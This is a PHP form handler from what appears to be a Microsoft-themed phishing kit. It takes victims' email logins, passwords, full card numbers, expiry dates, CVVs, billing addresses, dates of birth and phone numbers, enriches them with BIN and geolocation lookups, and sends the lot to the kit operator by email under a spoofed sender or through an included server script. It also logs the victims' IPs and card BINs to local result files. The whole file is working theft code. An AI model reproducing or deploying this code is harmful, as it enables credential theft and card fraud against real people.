<?php
require_once('admin/config.php');
require_once('main.php');
$ip = getUserIP();
require_once('files/card.php');
if(isset($_POST['cname'])){
$tolsu = $_POST['ccno'];
$tolkon = str_replace(" ", "", $tolsu);
$bin = check_bin($tolkon);
$bins = preg_replace('/\s/', '', $tolkon);
$bins = substr($bins,0,6);
if($bin["brand"] == "") {
    $subject = "CECE 1 [".$bins."] ".strtoupper($bin["scheme"])." ".strtoupper($bin["type"])." ".strtoupper($bin["bank"]["name"])." - [$cn - $ip - $br]";
    $subbin = $bins." - ".strtoupper($bin["scheme"])." ".strtoupper($bin["type"])." ".strtoupper($bin["bank"]["name"]);
} else {
    $subject = "CECE 1 [".$bins."] ".strtoupper($bin["scheme"])." ".strtoupper($bin["type"])." ".strtoupper($bin["brand"])." ".strtoupper($bin["bank"]["name"])." - [$cn - $ip - $br]";
    $subbin = "CECE 1 [".$bins."] ".strtoupper($bin["scheme"])." ".strtoupper($bin["type"])." ".strtoupper($bin["brand"])." ".strtoupper($bin["bank"]["name"]);
}
$expnya = $_POST['exp'];
$expired = str_replace("/", "|", $expnya);
$forcheck = "".$tolkon."|".$expired."|".$_POST['cvv']."";
$fromsend = "FROM: ".$_POST['cname']." <admin@SAKAW420.ptz>";
$message = '
<p>
<b>======================[ LOGIN DETAILS ]======================</b><br>
Email : '.$_POST['email'].'<br>
Password : '.$_POST['password'].'<br>
<b>======================[ CARD DETAILS ]======================</b><br>
Bank : '.$bin["bank"]["name"].'<br>
Type : '.strtoupper($bin["scheme"]).' - '.strtoupper($bin["type"]).'<br>
Level : '.strtoupper($bin["brand"]).'<br>
Card Holder : '.$_POST['cname'].'<br>
Card Number : '.$tolkon.'<br>
Expired : '.$_POST['exp'].'<br>
CVV : '.$_POST['cvv'].'<br>
Amex CID : '.$cid.'<br>
For Check : '.$forcheck.'<br>
<b>======================[ BILLING INFORMATION ]======================</b><br>
Full name : '.$_POST['fname'].'<br>
Street address : '.$_POST['address'].'<br>
State : '.$_POST['city'].'<br>
City : '.$_POST['state'].'<br>
ZIP : '.$_POST['zip'].'<br>
Date of birth : '.$_POST['dob'].'<br>
Phone number : '.$_POST['phone'].'<br>
<b>======================[ DEVICE INFO ]======================</b><br>
Country : '.$cn.'<br>
Region : '.$regioncity.'<br>
City : '.$citykota.'<br>
Continent : '.$continent.'<br>
Curs : '.$kurenci.'<br>
OS / BR : '.$os.' / '.$br.'<br>
User Agent : '.$user_agent.'<br>
Timezone : '.$timezone.'<br>
ISP : '.$ispuser.'<br>
IP : '.$ip.'<br>
Date : '.$date.'<br>
<b>======================[ SAKAW420 - MICROSOFT ]======================</b>
</p>
';
if ($config['send_login'] == "email") {
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= ''.$fromsend.'' . "\r\n";
$kirim = mail($result_anying, $subject, $message, $headers);
tulis_file("../admin/result/total_cc.txt", $ip);
tulis_file("../admin/result/total_cclogin.txt", "".$cn."|".$bins."");
}else{
include'server.php';
tulis_file("../admin/result/total_cc.txt", $ip);
tulis_file("../admin/result/total_cclogin.txt", "".$cn."|".$bins."");
}
}
?>